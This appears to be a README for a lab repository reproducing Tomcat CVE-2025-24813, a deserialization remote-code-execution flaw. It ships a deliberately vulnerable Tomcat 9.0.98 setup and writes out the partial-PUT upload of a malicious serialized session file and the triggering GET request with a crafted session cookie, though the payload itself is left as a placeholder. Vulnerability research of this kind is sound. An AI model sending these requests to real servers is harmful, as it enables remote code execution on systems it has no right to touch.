
tomcat CVE-2025-24813 反序列化RCE环境
Dieses Repository bietet eine Umgebung zur Reproduktion der aktuellen RCE-Schwachstelle CVE-2025-24813 in Tomcat.
Nur für Lern- und Forschungszwecke!
Diese Umgebung hat die oben genannten Bedingungen für die Reproduktion aktiviert.
Linux:
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run
Windows:
apache-tomcat-9.0.98/bin/catalina.bat run
Zugriff: http://127.0.0.1:9001/
Erstellen Sie eine bösartige serialisierte Datei und laden Sie sie mit dem folgenden Datenpaket hoch. Beachten Sie, dass der Bereichswert (Range) mit der Länge (Length) übereinstimmen und größer als die aktuelle Dateigröße sein muss.
PUT /xxxxx/session HTTP/1.1
Host: 192.168.131.32:8080
Content-Length: 1000
Content-Range: bytes 0-1000/1200
{{反序列化文件内容)}}
Zum Auslösen verwenden Sie den folgenden POC:
GET / HTTP/1.1
Host: 192.168.131.32:8080
Cookie: JSESSIONID=.xxxxx
Referenz: https://forum.butian.net/article/674